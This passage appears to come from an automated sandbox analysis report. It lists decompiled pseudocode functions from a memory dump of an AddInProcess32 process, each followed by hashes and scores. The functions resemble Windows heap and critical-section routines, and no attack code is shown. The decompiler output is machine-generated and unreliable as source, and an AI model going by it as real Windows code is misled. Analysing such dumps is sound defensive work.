                              					return E019288F5(_t13, _t14, _t15, _t16, _t17, __eflags);
                              				} else {
                              					return E01870050(_t14);
                              				}
                              			}











                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 112c01b4fcd39e5cfcd61cc086c9a77d0f8b992234cc1d4bb572fe77a876a0ac
                              • Instruction ID: 089ef76b6a710342f44c6296dfc42af9b58943d2b4462982574ff252a489db7f
                              • Opcode Fuzzy Hash: 112c01b4fcd39e5cfcd61cc086c9a77d0f8b992234cc1d4bb572fe77a876a0ac
                              • Instruction Fuzzy Hash: F7E0DFB02052049FD736DB59F060F293B9CAB92721F19801DE208CB102CE21DA80C286
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 82%
                              			E018E41E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                              				void* _t5;
                              				void* _t14;
                              
                              				_push(8);
                              				_push(0x19308f0);
                              				_t5 = E018AD08C(__ebx, __edi, __esi);
                              				if( *0x19487ec == 0) {
                              					E0186EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                              					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
                              					if( *0x19487ec == 0) {
                              						 *0x19487f0 = 0x19487ec;
                              						 *0x19487ec = 0x19487ec;
                              						 *0x19487e8 = 0x19487e4;
                              						 *0x19487e4 = 0x19487e4;
                              					}
                              					 *(_t14 - 4) = 0xfffffffe;
                              					_t5 = L018E4248();
                              				}
                              				return E018AD0D1(_t5);
                              			}






                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1faae1c735ca243ab53d7720e05a471297f15b0b44da025f3af602ce95b3639e
                              • Instruction ID: acc302319e1afe20d74a0d680a5b31c2fe1ded20dc59d0d3409b4380a01ed34e
                              • Opcode Fuzzy Hash: 1faae1c735ca243ab53d7720e05a471297f15b0b44da025f3af602ce95b3639e
                              • Instruction Fuzzy Hash: 75F01578894701CFDBB0EFE99524B283AE4F794312F40411AD108C7A88D73446A0CF02
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E0190D380(void* __ecx, void* __edx, intOrPtr _a4) {
                              				void* _t5;
                              
                              				if(_a4 != 0) {
                              					_t5 = L0185E8B0(__ecx, _a4, 0xfff);
                              					L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                              					return _t5;
                              				}
                              				return 0xc000000d;
                              			}





                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                              • Instruction ID: fd1add3851936e184b1d06a49467c1b125e3777bd6a8f34283c3463204ba3bdb
                              • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                              • Instruction Fuzzy Hash: F7E0C231280209BBDB235E88CC00F69BB9ADB507A5F104031FE089A6D0C671DE91D6C4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E0188A185() {
                              				void* __ecx;
                              				intOrPtr* _t5;
                              
                              				if( *0x19467e4 >= 0xa) {
                              					if(_t5 < 0x1946800 || _t5 >= 0x1946900) {
                              						return L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
                              					} else {
                              						goto L1;
                              					}
                              				} else {
                              					L1:
                              					return E01870010(0x19467e0, _t5);
                              				}
                              			}






                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 03b0af1ea7a3db892370249b09e94e40c5530e22c092425e7e0e6e554e88ae87
                              • Instruction ID: 48e36c38b494e40e84a9f599a163e3c1f5e408909e61c99e336ab2448d8baf22
                              • Opcode Fuzzy Hash: 03b0af1ea7a3db892370249b09e94e40c5530e22c092425e7e0e6e554e88ae87
                              • Instruction Fuzzy Hash: B2D02BF516060057C72D7304C914F257252F781B64F34040EF20BCB9D0E954CDD1E109
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E018816E0(void* __edx, void* __eflags) {
                              				void* __ecx;
                              				void* _t3;
                              
                              				_t3 = E01881710(0x19467e0);
                              				if(_t3 == 0) {
                              					_t6 =  *[fs:0x30];
                              					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
                              						goto L1;
                              					} else {
                              						return L01874620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
                              					}
                              				} else {
                              					L1:
                              					return _t3;
                              				}
                              			}






                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 46f59813791d3413e60a152eb94c286df1de654d327d7aa8723178f6361b01b6
                              • Instruction ID: f772fad337dee71563c71a28444fe903499d424177268ce79c5be33d07d709c8
                              • Opcode Fuzzy Hash: 46f59813791d3413e60a152eb94c286df1de654d327d7aa8723178f6361b01b6
                              • Instruction Fuzzy Hash: 83D0A7711102019AEA2DBB189808B143651EF90785F38005CF20BC98C0CFA0CED3E048
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E018D53CA(void* __ebx) {
                              				intOrPtr _t7;
                              				void* _t13;
                              				void* _t14;
                              				intOrPtr _t15;
                              				void* _t16;
                              
                              				_t13 = __ebx;
                              				if( *((char*)(_t16 - 0x65)) != 0) {
                              					E0186EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                              					_t7 =  *((intOrPtr*)(_t16 - 0x64));
                              					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
                              				}
                              				if(_t15 != 0) {
                              					L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
                              					return  *((intOrPtr*)(_t16 - 0x64));
                              				}
                              				return _t7;
                              			}









                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                              • Instruction ID: a94428b71a4c0b1d011525268c07d3f09af2ea6703d51f375b95975efc5545ab
                              • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                              • Instruction Fuzzy Hash: EFE08C319007849BCF16DB4CC690F4EBBF9FB45B40F140004A108AB620CA35EE00CB00
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E0186AAB0() {
                              				intOrPtr* _t4;
                              
                              				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                              				if(_t4 != 0) {
                              					if( *_t4 == 0) {
                              						goto L1;
                              					} else {
                              						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
                              					}
                              				} else {
                              					L1:
                              					return 0x7ffe0030;
                              				}
                              			}





                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                              • Instruction ID: de30568db8fc4fdcf42c6dea65b34d16373faa7e979cacfe1f389b3de211d38d
                              • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                              • Instruction Fuzzy Hash: 22D0E939352980CFD61BCB1DC594B5577A8BB44B45FC504A0E501CB762E62CDA44CA10
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E018835A1(void* __eax, void* __ebx, void* __ecx) {
                              				void* _t6;
                              				void* _t10;
                              				void* _t11;
                              
                              				_t10 = __ecx;
                              				_t6 = __eax;
                              				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
                              					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
                              				}
                              				if( *((char*)(_t11 - 0x1a)) != 0) {
                              					return E0186EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                              				}
                              				return _t6;
                              			}







                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                              • Instruction ID: dcaeaac93295ac9cccb6171802a1624a001a934ec4964d87d532aea89acb4c70
                              • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                              • Instruction Fuzzy Hash: 91D0A931401185BAEB02FF18C2187683BB2BB00B08F582465A90286852C33ACB0AC722
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E0185DB40() {
                              				signed int* _t3;
                              				void* _t5;
                              
                              				_t3 = L01874620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
                              				if(_t3 == 0) {
                              					return 0;
                              				} else {
                              					 *_t3 =  *_t3 | 0x00000400;
                              					return _t3;
                              				}
                              			}






                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                              • Instruction ID: 54706eff25e987705c8dbcccf1d919b62ee27c9790720de75aa2c017c9eb2d26
                              • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                              • Instruction Fuzzy Hash: 8DC08C30280A01EAFB222F24CD01B003AA1BB10B02F4400A06B00DA0F0EB78DA01E600
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E018DA537(intOrPtr _a4, intOrPtr _a8) {
                              
                              				return L01878E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
                              			}



                              0x018da553

                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                              • Instruction ID: 8d4de20235539cd2f869e452546c33ecd29296e1f27d6077f8f2cc39eb129c9f
                              • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                              • Instruction Fuzzy Hash: 09C08C33080248BBCB126F85CC00F067F2AFBA4B60F108410FA080B570C632EA70EB84
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E01873A1C(intOrPtr _a4) {
                              				void* _t5;
                              
                              				return L01874620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                              			}




                              0x01873a35

                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                              • Instruction ID: 1cc0bdef32f524a77e0e01e307c84c7cf2e7cd9015ec40a8909006ee74aa2bc1
                              • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                              • Instruction Fuzzy Hash: A6C08C32080248FBC7126E45DC00F017B29E7A0B60F000020B6040A5608532EDA0D588
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E0185AD30(intOrPtr _a4) {
                              
                              				return L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                              			}



                              0x0185ad49

                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                              • Instruction ID: 94c48a50090968f56c95aa9f98fc22f1339c7c09452360de6328478f26d80751
                              • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                              • Instruction Fuzzy Hash: 81C02B330C024CBBC7126F49CD00F01BF2DE7A0BA0F000020F6044B671C932ED61D588
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E018836CC(void* __ecx) {
                              
                              				if(__ecx > 0x7fffffff) {
                              					return 0;
                              				} else {
                              					return L01874620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                              				}
                              			}




                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                              • Instruction ID: 57b12d90fb3b10428726bfd54941865c5e9f01e180b298bceb88bd8a8cf9bb85
                              • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                              • Instruction Fuzzy Hash: 49C08C70150440EAEA156B288D00B147254B700B21F6402547220854E0D528ED00E100
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E018676E2(void* __ecx) {
                              				void* _t5;
                              
                              				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
                              					return L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                              				}
                              				return _t5;
                              			}

                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                              • Instruction ID: 5f9be77932f2a73453493447d2a009f015ec0e5a53e7d969caab639b47b4ee1c
                              • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                              • Instruction Fuzzy Hash: 8AC08C701411845AEB2A570CCE24B203A59AB0870DF68019CAA01894A2C36CEE03C248
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E01877D50() {
                              				intOrPtr* _t3;
                              
                              				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                              				if(_t3 != 0) {
                              					return  *_t3;
                              				} else {
                              					return _t3;
                              				}
                              			}

                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                              • Instruction ID: d088f846dece8ef4de7c2ebae3340c531084f13a28b1fb3858835ca3f32653a0
                              • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                              • Instruction Fuzzy Hash: B1B092353029808FCE16DF18C084B1533E4BB48B40B8400D0E400CBA21D229E900C900
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E01882ACB() {
                              				void* _t5;
                              
                              				return E0186EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                              			}

                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                              • Instruction ID: f8522929d8d38b23e71a84c164e97027f35e4cb6669095392d82be9a36d6ef11
                              • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                              • Instruction Fuzzy Hash: 82B01232C10441CFCF02EF44C650B197335FB00750F054490910177930C229AD01CB40
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 26%
                              			E0188645B(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
                              				signed int _v8;
                              				void* _v36;
                              				intOrPtr _v48;
                              				intOrPtr _v52;
                              				intOrPtr _v56;
                              				char _v60;
                              				char _v64;
                              				intOrPtr _v68;
                              				intOrPtr _v72;
                              				intOrPtr _v76;
                              				intOrPtr _v80;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				intOrPtr _t48;
                              				intOrPtr _t49;
                              				intOrPtr _t50;
                              				intOrPtr* _t52;
                              				char _t56;
                              				void* _t69;
                              				char _t72;
                              				void* _t73;
                              				intOrPtr _t75;
                              				intOrPtr _t79;
                              				void* _t82;
                              				void* _t84;
                              				intOrPtr _t86;
                              				void* _t88;
                              				signed int _t90;
                              				signed int _t92;
                              				signed int _t93;
                              
                              				_t80 = __edx;
                              				_t92 = (_t90 & 0xfffffff8) - 0x4c;
                              				_v8 =  *0x194d360 ^ _t92;
                              				_t72 = 0;
                              				_v72 = __edx;
                              				_t82 = __ecx;
                              				_t86 =  *((intOrPtr*)(__edx + 0xc8));
                              				_v68 = _t86;
                              				E0189FA60( &_v60, 0, 0x30);
                              				_t48 =  *((intOrPtr*)(_t82 + 0x70));
                              				_t93 = _t92 + 0xc;
                              				_v76 = _t48;
                              				_t49 = _t48;
                              				if(_t49 == 0) {
                              					_push(5);
                              					 *((char*)(_t82 + 0x6a)) = 0;
                              					 *((intOrPtr*)(_t82 + 0x6c)) = 0;
                              					goto L3;
                              				} else {
                              					_t69 = _t49 - 1;
                              					if(_t69 != 0) {
                              						if(_t69 == 1) {
                              							_push(0xa);
                              							goto L3;
                              						} else {
                              							_t56 = 0;
                              						}
                              					} else {
                              						_push(4);
                              						L3:
                              						_pop(_t50);
                              						_v80 = _t50;
                              						if(_a4 == _t72 && _t86 != 0 && _t50 != 0xa &&  *((char*)(_t82 + 0x6b)) == 1) {
                              							E01872280(_t50, _t86 + 0x1c);
                              							_t79 = _v72;
                              							 *((intOrPtr*)(_t79 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                              							 *((intOrPtr*)(_t79 + 0x88)) =  *((intOrPtr*)(_t82 + 0x68));
                              							 *((intOrPtr*)(_t79 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x6c));
                              							 *((intOrPtr*)(_t79 + 0x90)) = _v80;
                              							 *((intOrPtr*)(_t79 + 0x20)) = _t72;
                              							E0186FFB0(_t72, _t82, _t86 + 0x1c);
                              						}
                              						_t75 = _v80;
                              						_t52 =  *((intOrPtr*)(_v72 + 0x20));
                              						_t80 =  *_t52;
                              						_v72 =  *((intOrPtr*)(_t52 + 4));
                              						_v52 =  *((intOrPtr*)(_t82 + 0x68));
                              						_v60 = 0x30;
                              						_v56 = _t75;
                              						_v48 =  *((intOrPtr*)(_t82 + 0x6c));
                              						asm("movsd");
                              						_v76 = _t80;
                              						_v64 = 0x30;
                              						asm("movsd");
                              						asm("movsd");
                              						asm("movsd");
                              						if(_t80 != 0) {
                              							 *0x194b1e0(_t75, _v72,  &_v64,  &_v60);
                              							_t72 = _v76();
                              						}
                              						_t56 = _t72;
                              					}
                              				}
                              				_pop(_t84);
                              				_pop(_t88);
                              				_pop(_t73);
                              				return E0189B640(_t56, _t73, _v8 ^ _t93, _t80, _t84, _t88);
                              			}

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID: DebugPrintTimes
                              • String ID: 0$0
                              • API String ID: 3446177414-203156872
                              • Opcode ID: 2f31ab7d4e97723f066e89d2f3abf7d701ddbc35dd70fb9ed8a75d244e7ad0b0
                              • Instruction ID: 8205685d6e21e3cb989152c04302366d387bbc0ad16a3d2efc5d139bf1926cc6
                              • Opcode Fuzzy Hash: 2f31ab7d4e97723f066e89d2f3abf7d701ddbc35dd70fb9ed8a75d244e7ad0b0
                              • Instruction Fuzzy Hash: F6415BB16087069FC311DF2CC584A1ABBE5FB89718F14456EF588DB301D731EA05CB96
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 53%
                              			E018EFDDA(intOrPtr* __edx, intOrPtr _a4) {
                              				void* _t7;
                              				intOrPtr _t9;
                              				intOrPtr _t10;
                              				intOrPtr* _t12;
                              				intOrPtr* _t13;
                              				intOrPtr _t14;
                              				intOrPtr* _t15;
                              
                              				_t13 = __edx;
                              				_push(_a4);
                              				_t14 =  *[fs:0x18];
                              				_t15 = _t12;
                              				_t7 = E0189CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                              				_push(_t13);
                              				E018E5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                              				_t9 =  *_t15;
                              				if(_t9 == 0xffffffff) {
                              					_t10 = 0;
                              				} else {
                              					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                              				}
                              				_push(_t10);
                              				_push(_t15);
                              				_push( *((intOrPtr*)(_t15 + 0xc)));
                              				_push( *((intOrPtr*)(_t14 + 0x24)));
                              				return E018E5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                              			}

                              APIs
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018EFDFA
                              Strings
                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018EFE01
                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018EFE2B
                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                              • API String ID: 885266447-3903918235
                              • Opcode ID: 0f3573a719cee61d27cce6e11a83dc36f392c38dafaed9a675329c82d68ca1d0
                              • Instruction ID: 73cff755b631ae4b1bd64d8b18b1312dfa073e4ad0b0a51101c55afcaad3a0d4
                              • Opcode Fuzzy Hash: 0f3573a719cee61d27cce6e11a83dc36f392c38dafaed9a675329c82d68ca1d0
                              • Instruction Fuzzy Hash: B7F0FC76144102BFE6201A49DC05F237F9ADB45730F140314F714961D1DA62FA3087F5
                              Uniqueness

                              Uniqueness Score: -1.00%